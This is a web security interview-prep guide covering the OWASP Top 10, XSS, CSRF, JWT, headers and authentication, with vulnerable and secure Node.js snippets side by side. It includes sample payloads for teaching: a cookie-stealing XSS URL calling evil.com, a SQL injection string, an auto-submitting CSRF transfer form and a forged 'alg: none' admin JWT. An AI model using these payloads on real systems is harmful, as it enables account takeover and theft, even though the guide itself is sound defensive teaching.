What is the OWASP Top 10?

The OWASP Top 10 is a regularly updated list of the most critical security risks facing web applications, based on data from security experts worldwide. The 2021 version includes Broken Access Control (#1), Cryptographic Failures, Injection, Insecure Design, Security Misconfiguration, Vulnerable Components, Authentication Failures, Software Integrity Failures, Logging Failures, and SSRF. It serves as the industry standard for web application security awareness.

What is the difference between XSS and CSRF?

XSS (Cross-Site Scripting) injects malicious scripts into pages viewed by other users, stealing cookies or session data. CSRF (Cross-Site Request Forgery) tricks authenticated users into performing unwanted actions on sites where they're logged in. XSS exploits trust a user has in a website, while CSRF exploits trust a website has in a user's browser. XSS is prevented by output encoding and CSP; CSRF is prevented by tokens and SameSite cookies.

What is Content Security Policy (CSP)?

Content Security Policy is an HTTP response header that tells browsers which sources of content are allowed to load and execute. It prevents XSS by blocking inline scripts and restricting script sources. A basic CSP might be "default-src 'self'; script-src 'self' https://trusted-cdn.com". CSP can block inline event handlers, eval(), and scripts from untrusted domains, significantly reducing XSS attack surface.

How should passwords be stored securely?

Passwords should never be stored in plaintext or using fast hashing algorithms like MD5 or SHA-1. Use dedicated password hashing algorithms designed to be slow: Argon2id (recommended), bcrypt, or scrypt. Always use unique salts per password (modern algorithms handle this automatically). Set appropriate cost factors - bcrypt should take at least 250ms to compute. Never encrypt passwords; always hash them one-way.

What is the Same-Origin Policy?

The Same-Origin Policy (SOP) is a browser security mechanism that restricts how documents from one origin can interact with resources from another origin. An origin is defined by protocol + domain + port - all three must match. SOP prevents malicious sites from reading data from other sites through the user's browser. CORS (Cross-Origin Resource Sharing) provides controlled exceptions to SOP when servers explicitly allow cross-origin requests.

Web Security & OWASP Interview Questions Complete Guide 2026 [UPDATED]

Q: How do you prevent SQL injection?

SQL injection is prevented primarily through parameterized queries (prepared statements), which separate SQL code from user data. Never concatenate user input directly into SQL strings. Additional defenses include using ORM frameworks, validating input against whitelists, applying least privilege to database accounts, and using stored procedures. Example of safe code: db.query('SELECT * FROM users WHERE id = ?', [userId]).

A single SQL injection vulnerability cost one company $400 million in 2017. According to Verizon's 2024 Data Breach Report, 83% of breaches involve web application attacks—and security questions now appear in 4 out of 5 senior developer interviews. Whether you're building the next fintech startup or maintaining enterprise applications, understanding web security is no longer optional.

The 30-Second Answer

When the interviewer asks "What are the main web security risks?", here's your concise answer:

"The OWASP Top 10 is the industry standard for web security risks. The top three are Broken Access Control—users accessing data they shouldn't; Cryptographic Failures—sensitive data not properly encrypted; and Injection—like SQL injection where user input becomes code. Prevention involves defense in depth: input validation, output encoding, parameterized queries, proper authentication, and security headers like CSP."

Wait for follow-up questions. Don't try to list all ten vulnerabilities.

The 2-Minute Answer (If They Want More)

If they ask you to elaborate:

"OWASP is a nonprofit that maintains security standards and tools. Their Top 10 is updated every 3-4 years based on real vulnerability data from hundreds of thousands of applications.

The 2021 Top 10 includes:

Broken Access Control - 94% of apps tested had issues here

Cryptographic Failures - storing sensitive data insecurely

Injection - SQL, NoSQL, OS command, LDAP injection

Insecure Design - flaws in architecture, not just implementation

Security Misconfiguration - default credentials, verbose errors

Vulnerable Components - outdated dependencies with known CVEs

Authentication Failures - weak passwords, session issues

Software Integrity Failures - supply chain attacks, insecure CI/CD

Logging Failures - not detecting breaches

SSRF - server making requests to internal resources

Prevention requires layers: validate all input, encode all output, use parameterized queries, implement proper access control, keep dependencies updated, use security headers, and log security events."

OWASP Top 10: What Interviewers Actually Ask

A01: Broken Access Control

This is ranked #1 because 94% of tested applications had access control issues.

Interview Question: "What is Broken Access Control and how do you prevent it?"

// VULNERABLE: Direct object reference without authorization
app.get('/api/orders/:orderId', async (req, res) => {
  // Only checks authentication, not authorization
  const order = await db.query(
    'SELECT * FROM orders WHERE id = ?',
    [req.params.orderId]
  );
  res.json(order); // Attacker can access any order: /api/orders/1, /api/orders/2...
});
 
// SECURE: Always verify ownership
app.get('/api/orders/:orderId', async (req, res) => {
  const order = await db.query(
    'SELECT * FROM orders WHERE id = ? AND user_id = ?',
    [req.params.orderId, req.user.id]  // Include user_id in query
  );
 
  if (!order) {
    return res.status(404).json({ error: 'Order not found' });
  }
 
  res.json(order);
});
 
// BETTER: Use session context instead of URL parameters
app.get('/api/my/orders', async (req, res) => {
  // User ID comes from authenticated session, not URL
  const orders = await db.query(
    'SELECT * FROM orders WHERE user_id = ?',
    [req.user.id]
  );
  res.json(orders);
});

Key points to mention:

IDOR (Insecure Direct Object Reference) is the most common pattern
Horizontal escalation: accessing peer users' data
Vertical escalation: accessing admin functions as regular user
Always enforce access control server-side, never trust client

A02: Cryptographic Failures

Interview Question: "How should you store passwords?"

// NEVER: Plaintext storage
const user = { email, password: plainPassword }; // Immediate breach exposure
 
// NEVER: Fast hashing algorithms
const hash = crypto.createHash('sha256').update(password).digest('hex');
// SHA-256 can compute billions per second - easily brute-forced
 
// NEVER: MD5 (broken, rainbow tables exist)
const hash = crypto.createHash('md5').update(password).digest('hex');
 
// CORRECT: Use bcrypt with appropriate cost factor
const bcrypt = require('bcrypt');
const COST_FACTOR = 12; // Should take ~250ms
 
async function hashPassword(password) {
  return await bcrypt.hash(password, COST_FACTOR);
}
 
async function verifyPassword(password, hash) {
  return await bcrypt.compare(password, hash);
}
 
// BETTER: Argon2id (winner of Password Hashing Competition)
const argon2 = require('argon2');
 
async function hashPassword(password) {
  return await argon2.hash(password, {
    type: argon2.argon2id,
    memoryCost: 65536,  // 64MB
    timeCost: 3,
    parallelism: 4
  });
}
 
async function verifyPassword(password, hash) {
  return await argon2.verify(hash, password);
}

Why bcrypt/Argon2 instead of SHA-256?

Deliberately slow - configurable cost factor prevents brute force
Salt built-in - each password gets unique salt automatically
Memory-hard (Argon2) - resists GPU attacks
Future-proof - cost can increase as hardware improves

A03: Injection

Interview Question: "How do you prevent SQL injection?"

// VULNERABLE: String concatenation
app.get('/api/users', async (req, res) => {
  const query = `SELECT * FROM users WHERE name = '${req.query.name}'`;
  // Attack: ?name=' OR '1'='1' --
  // Result: SELECT * FROM users WHERE name = '' OR '1'='1' --'
  // Returns ALL users!
 
  const users = await db.query(query);
  res.json(users);
});
 
// VULNERABLE: Even with "sanitization"
const name = req.query.name.replace(/'/g, "''"); // Easily bypassed
 
// SECURE: Parameterized queries (prepared statements)
app.get('/api/users', async (req, res) => {
  const users = await db.query(
    'SELECT * FROM users WHERE name = ?',  // Placeholder
    [req.query.name]  // User input as parameter, never concatenated
  );
  res.json(users);
});
 
// SECURE: Using ORM (Sequelize, Prisma, etc.)
const users = await User.findAll({
  where: {
    name: req.query.name  // ORM handles parameterization
  }
});
 
// SECURE: MongoDB with Mongoose
const users = await User.find({ name: req.query.name });
// Note: Still validate input to prevent NoSQL injection
// Attack: { "$gt": "" } would match all documents
const name = typeof req.query.name === 'string' ? req.query.name : '';

Why parameterized queries work:

SQL engine parses query structure FIRST
User input is then bound as DATA, never executed as code
Even '; DROP TABLE users; -- is treated as a literal string

Cross-Site Scripting (XSS)

Interview Question: "What are the types of XSS and how do you prevent them?"

Three Types of XSS

// 1. REFLECTED XSS - Attack in URL, reflected in response
// URL: example.com/search?q=<script>document.location='http://evil.com/steal?c='+document.cookie</script>
 
app.get('/search', (req, res) => {
  // VULNERABLE: User input directly in HTML
  res.send(`<h1>Results for: ${req.query.q}</h1>`);
});
 
// 2. STORED XSS - Attack saved in database, shown to all users
app.post('/comments', async (req, res) => {
  // VULNERABLE: Malicious comment stored and shown to everyone
  await db.saveComment(req.body.comment);
  // If comment is "<script>stealCookies()</script>", every viewer is attacked
});
 
// 3. DOM-BASED XSS - Attack in client-side JavaScript
// VULNERABLE: URL fragment or query used unsafely
document.getElementById('output').innerHTML = location.hash.substring(1);
// URL: example.com#<img src=x onerror=alert('XSS') />

Prevention Strategies

// SOLUTION 1: Output encoding
const escapeHtml = (str) => {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
};
 
app.get('/search', (req, res) => {
  res.send(`<h1>Results for: ${escapeHtml(req.query.q)}</h1>`);
});
 
// SOLUTION 2: Use textContent instead of innerHTML
document.getElementById('output').textContent = userInput; // Safe
 
// SOLUTION 3: Content Security Policy header
app.use((req, res, next) => {
  res.setHeader(
    'Content-Security-Policy',
    "default-src 'self'; " +
    "script-src 'self'; " +  // No inline scripts, no eval
    "style-src 'self' 'unsafe-inline'; " +
    "img-src 'self' data: https:; " +
    "connect-src 'self' https://api.example.com"
  );
  next();
});
 
// SOLUTION 4: Template engines with auto-escaping (React, Vue, Angular)
// React automatically escapes:
function Comment({ text }) {
  return <p>{text}</p>;  // <script> becomes &lt;script&gt;
}
 
// DANGER: dangerouslySetInnerHTML bypasses protection
<div dangerouslySetInnerHTML={{ __html: userInput }} /> // NEVER with user input

CSP header explanation:

default-src 'self' - Only load resources from same origin
script-src 'self' - Blocks inline scripts and eval()
connect-src - Limits AJAX/fetch destinations
Report violations: report-uri /csp-report

Cross-Site Request Forgery (CSRF)

Interview Question: "What is CSRF and how do you prevent it?"

<!-- ATTACK SCENARIO -->
<!-- User is logged into bank.com -->
<!-- Attacker's page (evil.com) contains: -->
<img src="https://bank.com/transfer?to=attacker&amount=10000" />
<!-- Or hidden form that auto-submits: -->
<form action="https://bank.com/transfer" method="POST" id="csrf">
  <input type="hidden" name="to" value="attacker" />
  <input type="hidden" name="amount" value="10000" />
</form>
<script>document.getElementById('csrf').submit();</script>
<!-- User's cookies are automatically sent - transfer executed! -->

Prevention Strategies

// SOLUTION 1: CSRF Tokens
const csrf = require('csurf');
const csrfProtection = csrf({ cookie: true });
 
app.get('/transfer', csrfProtection, (req, res) => {
  // Include token in form
  res.send(`
    <form action="/transfer" method="POST">
      <input type="hidden" name="_csrf" value="${req.csrfToken()}" />
      <input name="to" />
      <input name="amount" />
      <button>Transfer</button>
    </form>
  `);
});
 
app.post('/transfer', csrfProtection, (req, res) => {
  // Middleware validates token - rejects if missing or invalid
  performTransfer(req.body);
});
 
// SOLUTION 2: SameSite Cookies
app.use(session({
  secret: process.env.SESSION_SECRET,
  cookie: {
    httpOnly: true,      // JavaScript can't access
    secure: true,        // HTTPS only
    sameSite: 'strict',  // Cookie only sent for same-site requests
    // 'lax' allows GET requests from external links (better UX)
  }
}));
 
// SOLUTION 3: Verify Origin/Referer headers
function validateOrigin(req, res, next) {
  const origin = req.headers.origin || req.headers.referer;
  const allowedOrigins = ['https://bank.com', 'https://www.bank.com'];
 
  if (!origin || !allowedOrigins.some(o => origin.startsWith(o))) {
    return res.status(403).json({ error: 'Invalid origin' });
  }
  next();
}
 
// SOLUTION 4: Custom header requirement (for APIs)
// Browsers add Origin header to cross-origin requests
// But won't add custom headers like X-Requested-With
app.use((req, res, next) => {
  if (req.method !== 'GET' && !req.headers['x-requested-with']) {
    return res.status(403).json({ error: 'Missing X-Requested-With header' });
  }
  next();
});

SameSite cookie values:

Strict - Cookie never sent with cross-site requests (breaks external links)
Lax - Cookie sent with top-level GET navigation only (good default)
None - Cookie sent with all requests (requires Secure; breaks CSRF protection)

JWT Security

Interview Question: "What are the security considerations for JWT tokens?"

// JWT Structure: header.payload.signature
// eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
// eyJ1c2VySWQiOjEyMywicm9sZSI6ImFkbWluIn0.
// signature
 
// VULNERABILITY 1: Algorithm confusion
// Attacker changes alg: "HS256" to alg: "none"
const maliciousToken = {
  header: { alg: 'none', typ: 'JWT' },
  payload: { userId: 123, role: 'admin' }
};
 
// DEFENSE: Always specify allowed algorithms
const jwt = require('jsonwebtoken');
 
function verifyToken(token) {
  return jwt.verify(token, process.env.JWT_SECRET, {
    algorithms: ['HS256'],  // Reject 'none' and RS256
  });
}
 
// VULNERABILITY 2: Weak secret
jwt.sign(payload, 'secret123');  // Easily cracked
 
// DEFENSE: Strong secret (256+ bits for HS256)
const crypto = require('crypto');
const JWT_SECRET = crypto.randomBytes(64).toString('hex');
 
// VULNERABILITY 3: Sensitive data in payload
jwt.sign({
  userId: 123,
  password: 'hash',  // NEVER put sensitive data here!
  ssn: '123-45-6789'
}, secret);
 
// VULNERABILITY 4: Missing expiration
jwt.sign({ userId: 123 }, secret);  // Token valid forever
 
// DEFENSE: Always set expiration
jwt.sign({ userId: 123 }, secret, { expiresIn: '15m' });
 
// VULNERABILITY 5: Token stored in localStorage
localStorage.setItem('token', jwt);  // XSS can steal it
 
// DEFENSE: Use httpOnly cookies for web apps
res.cookie('token', jwt, {
  httpOnly: true,   // Not accessible via JavaScript
  secure: true,     // HTTPS only
  sameSite: 'lax',  // CSRF protection
  maxAge: 900000    // 15 minutes
});
 
// Complete secure implementation
function createToken(user) {
  return jwt.sign(
    {
      sub: user.id,
      role: user.role,
      // No sensitive data!
    },
    process.env.JWT_SECRET,
    {
      algorithm: 'HS256',
      expiresIn: '15m',
      issuer: 'your-app',
      audience: 'your-app-users',
    }
  );
}
 
function verifyToken(token) {
  try {
    return jwt.verify(token, process.env.JWT_SECRET, {
      algorithms: ['HS256'],
      issuer: 'your-app',
      audience: 'your-app-users',
    });
  } catch (error) {
    if (error.name === 'TokenExpiredError') {
      throw new Error('Token expired');
    }
    throw new Error('Invalid token');
  }
}

Security Headers

Interview Question: "What security headers should every application implement?"

const helmet = require('helmet');
 
// Recommended: Use helmet with customization
app.use(helmet({
  contentSecurityPolicy: {
    directives: {
      defaultSrc: ["'self'"],
      scriptSrc: ["'self'"],  // No 'unsafe-inline'!
      styleSrc: ["'self'", "'unsafe-inline'"],
      imgSrc: ["'self'", "data:", "https:"],
      connectSrc: ["'self'", "https://api.yourapp.com"],
      fontSrc: ["'self'", "https://fonts.gstatic.com"],
      objectSrc: ["'none'"],
      upgradeInsecureRequests: [],
    },
  },
  hsts: {
    maxAge: 31536000,
    includeSubDomains: true,
    preload: true,
  },
}));
 
// Manual implementation for understanding
app.use((req, res, next) => {
  // Prevent XSS - control what can load/execute
  res.setHeader('Content-Security-Policy',
    "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'");
 
  // Force HTTPS
  res.setHeader('Strict-Transport-Security',
    'max-age=31536000; includeSubDomains; preload');
 
  // Prevent clickjacking
  res.setHeader('X-Frame-Options', 'DENY');
 
  // Prevent MIME type sniffing
  res.setHeader('X-Content-Type-Options', 'nosniff');
 
  // Control referrer information
  res.setHeader('Referrer-Policy', 'strict-origin-when-cross-origin');
 
  // Control browser features
  res.setHeader('Permissions-Policy',
    'geolocation=(), camera=(), microphone=()');
 
  // Remove server identification
  res.removeHeader('X-Powered-By');
 
  next();
});

What each header prevents:

Header	Attack Prevented	Value
Content-Security-Policy	XSS, injection	Whitelist allowed sources
Strict-Transport-Security	SSL stripping	max-age=31536000
X-Frame-Options	Clickjacking	DENY or SAMEORIGIN
X-Content-Type-Options	MIME confusion	nosniff
Referrer-Policy	Information leakage	strict-origin-when-cross-origin

Authentication Best Practices

Interview Question: "How do you implement secure authentication?"

const bcrypt = require('bcrypt');
const crypto = require('crypto');
 
// Password requirements
const PASSWORD_POLICY = {
  minLength: 12,
  requireUppercase: true,
  requireLowercase: true,
  requireNumber: true,
  requireSpecial: true,
  maxLength: 128,  // Prevent DoS via bcrypt
};
 
function validatePassword(password) {
  if (password.length < PASSWORD_POLICY.minLength) {
    return { valid: false, error: 'Password must be at least 12 characters' };
  }
  if (password.length > PASSWORD_POLICY.maxLength) {
    return { valid: false, error: 'Password too long' };
  }
  // Additional checks...
  return { valid: true };
}
 
// Account lockout after failed attempts
const loginAttempts = new Map();
const MAX_ATTEMPTS = 5;
const LOCKOUT_TIME = 15 * 60 * 1000; // 15 minutes
 
async function login(email, password) {
  const attempts = loginAttempts.get(email) || { count: 0, lockedUntil: 0 };
 
  // Check lockout
  if (attempts.lockedUntil > Date.now()) {
    const waitMinutes = Math.ceil((attempts.lockedUntil - Date.now()) / 60000);
    throw new Error(`Account locked. Try again in ${waitMinutes} minutes.`);
  }
 
  const user = await db.findUserByEmail(email);
 
  // Timing attack prevention: always compare even if user doesn't exist
  const dummyHash = await bcrypt.hash('dummy', 12);
  const hashToCompare = user ? user.passwordHash : dummyHash;
 
  const valid = await bcrypt.compare(password, hashToCompare);
 
  if (!valid || !user) {
    // Increment failed attempts
    attempts.count++;
    if (attempts.count >= MAX_ATTEMPTS) {
      attempts.lockedUntil = Date.now() + LOCKOUT_TIME;
    }
    loginAttempts.set(email, attempts);
 
    // Generic error message (don't reveal if user exists)
    throw new Error('Invalid email or password');
  }
 
  // Reset attempts on successful login
  loginAttempts.delete(email);
 
  return createSession(user);
}
 
// Secure session management
function createSession(user) {
  const sessionId = crypto.randomBytes(32).toString('hex');
 
  // Store session server-side
  sessions.set(sessionId, {
    userId: user.id,
    createdAt: Date.now(),
    lastActive: Date.now(),
    ipAddress: req.ip,
    userAgent: req.headers['user-agent'],
  });
 
  return sessionId;
}
 
// Session validation
function validateSession(sessionId, req) {
  const session = sessions.get(sessionId);
 
  if (!session) return null;
 
  // Session timeout (30 minutes of inactivity)
  if (Date.now() - session.lastActive > 30 * 60 * 1000) {
    sessions.delete(sessionId);
    return null;
  }
 
  // Absolute timeout (24 hours)
  if (Date.now() - session.createdAt > 24 * 60 * 60 * 1000) {
    sessions.delete(sessionId);
    return null;
  }
 
  // Update last active
  session.lastActive = Date.now();
 
  return session;
}

Rate Limiting and Brute Force Prevention

const rateLimit = require('express-rate-limit');
 
// General API rate limiting
const apiLimiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 100, // Limit each IP to 100 requests per window
  message: { error: 'Too many requests, please try again later' },
  standardHeaders: true,
  legacyHeaders: false,
});
 
// Strict rate limiting for auth endpoints
const authLimiter = rateLimit({
  windowMs: 15 * 60 * 1000,
  max: 5, // Only 5 login attempts per 15 minutes
  message: { error: 'Too many login attempts' },
  skipSuccessfulRequests: true, // Don't count successful logins
});
 
// Apply limiters
app.use('/api/', apiLimiter);
app.use('/api/auth/', authLimiter);
 
// IP-based + account-based limiting
const loginAttempts = new Map();
 
async function checkRateLimit(ip, email) {
  const ipKey = `ip:${ip}`;
  const emailKey = `email:${email}`;
 
  const ipAttempts = loginAttempts.get(ipKey) || 0;
  const emailAttempts = loginAttempts.get(emailKey) || 0;
 
  // Block if too many attempts from same IP
  if (ipAttempts >= 20) {
    throw new Error('Too many requests from this IP');
  }
 
  // Block if too many attempts on same account
  if (emailAttempts >= 5) {
    throw new Error('Account temporarily locked');
  }
 
  // Increment counters
  loginAttempts.set(ipKey, ipAttempts + 1);
  loginAttempts.set(emailKey, emailAttempts + 1);
 
  // Auto-reset after 15 minutes
  setTimeout(() => {
    loginAttempts.delete(ipKey);
    loginAttempts.delete(emailKey);
  }, 15 * 60 * 1000);
}

Secure Coding Checklist

Use this during interviews when asked about security review processes:

Input Validation

All user input validated on server (never trust client)
Whitelist validation preferred over blacklist
Input length limits enforced
File uploads validated (type, size, content)

Authentication

Passwords hashed with bcrypt/Argon2
Multi-factor authentication available
Account lockout after failed attempts
Secure password reset flow

Session Management

Session tokens are random and unpredictable
Session timeout implemented (idle and absolute)
Session invalidated on logout
Secure cookie flags set (HttpOnly, Secure, SameSite)

Access Control

Authorization checked on every request
Principle of least privilege applied
Direct object references validated

Data Protection

Sensitive data encrypted at rest
TLS 1.2+ for data in transit
Sensitive data not logged
Proper key management

Security Headers

CSP implemented
HSTS enabled
X-Frame-Options set
X-Content-Type-Options: nosniff

Common Interview Scenarios

Scenario 1: "You discover a security vulnerability in production"

"First, I assess severity using CVSS or a similar framework. For critical vulnerabilities, I escalate immediately and consider if we need an emergency patch. I document the issue, including exploitation details, then work on a fix in an isolated branch. After the fix, I conduct a thorough code review focused on security. Once deployed, I verify the fix works and the vulnerability is closed. Finally, I conduct a retrospective to prevent similar issues."

Scenario 2: "How would you secure a REST API?"

"I'd implement multiple layers: authentication using JWT or OAuth 2.0 with short-lived tokens; authorization checks on every endpoint; input validation with strict schemas; rate limiting per user and IP; HTTPS enforcement; security headers especially CORS configuration; logging of security events; and regular dependency updates. For sensitive operations, I'd add additional verification like re-authentication."

Scenario 3: "Review this code for security issues"

// Given this code:
app.post('/api/user', (req, res) => {
  const { email, password, isAdmin } = req.body;
  db.query(`INSERT INTO users (email, password, is_admin)
            VALUES ('${email}', '${password}', ${isAdmin})`);
  res.json({ success: true });
});
 
// Issues to identify:
// 1. SQL Injection (string concatenation)
// 2. Password stored in plaintext
// 3. Mass assignment (user can set isAdmin)
// 4. No input validation
// 5. No authentication check
// 6. No rate limiting

Red Flags to Avoid in Interviews

Saying "we encrypt passwords" - Passwords are hashed, not encrypted
Recommending MD5 or SHA-1 - These are broken for passwords
Trusting client-side validation - Always validate server-side
Suggesting regex for HTML sanitization - Use proper libraries
Storing JWT in localStorage - Use httpOnly cookies for web apps
"Security through obscurity" - Not a valid security strategy

Quick Reference: OWASP Top 10 (2021)

Rank	Category	Prevention
A01	Broken Access Control	Server-side authorization, deny by default
A02	Cryptographic Failures	Strong encryption, secure key management
A03	Injection	Parameterized queries, input validation
A04	Insecure Design	Threat modeling, secure design patterns
A05	Security Misconfiguration	Hardening, remove defaults, patch regularly
A06	Vulnerable Components	Dependency scanning, regular updates
A07	Auth Failures	MFA, rate limiting, secure sessions
A08	Integrity Failures	Signed updates, SRI, secure CI/CD
A09	Logging Failures	Log security events, monitor anomalies
A10	SSRF	Validate URLs, block internal networks

What Interviewers Really Want to Hear

Understanding, not just memorization - Explain WHY attacks work
Defense in depth - Multiple layers of protection
Real-world awareness - Mention actual breaches or CVEs
Practical experience - Share how you've implemented security
Security mindset - Thinking about edge cases and attack vectors

Security questions aren't just about knowing OWASP categories—they reveal how you think about protecting users and data. Show that you understand the attacker's perspective and can translate that understanding into defensive code.

If you found this helpful, check out these related guides:

Complete Node.js Backend Developer Interview Guide - comprehensive preparation guide for backend interviews
Authentication & JWT Interview Guide - Sessions, JWT, OAuth 2.0, and secure auth patterns
REST API Interview Guide - API design principles and best practices
Node.js Advanced Interview Guide - Event loop, streams, and Node.js internals
System Design Interview Guide - Security considerations in distributed systems
Complete DevOps Engineer Interview Guide - comprehensive preparation guide for DevOps interviews

Master more interview topics with our REST API Design Guide and Node.js Advanced Questions.

Web Security & OWASP Interview Questions Complete Guide 2026 [UPDATED]

The 30-Second Answer

The 2-Minute Answer (If They Want More)

OWASP Top 10: What Interviewers Actually Ask

A01: Broken Access Control

A02: Cryptographic Failures

A03: Injection

Cross-Site Scripting (XSS)

Three Types of XSS

Prevention Strategies

Cross-Site Request Forgery (CSRF)

Prevention Strategies

JWT Security

Security Headers

Authentication Best Practices

Rate Limiting and Brute Force Prevention

Secure Coding Checklist

Input Validation

Authentication

Session Management

Access Control

Data Protection

Security Headers

Common Interview Scenarios

Scenario 1: "You discover a security vulnerability in production"

Scenario 2: "How would you secure a REST API?"

Scenario 3: "Review this code for security issues"

Red Flags to Avoid in Interviews

Quick Reference: OWASP Top 10 (2021)

What Interviewers Really Want to Hear

Related Articles

Ready to ace your interview?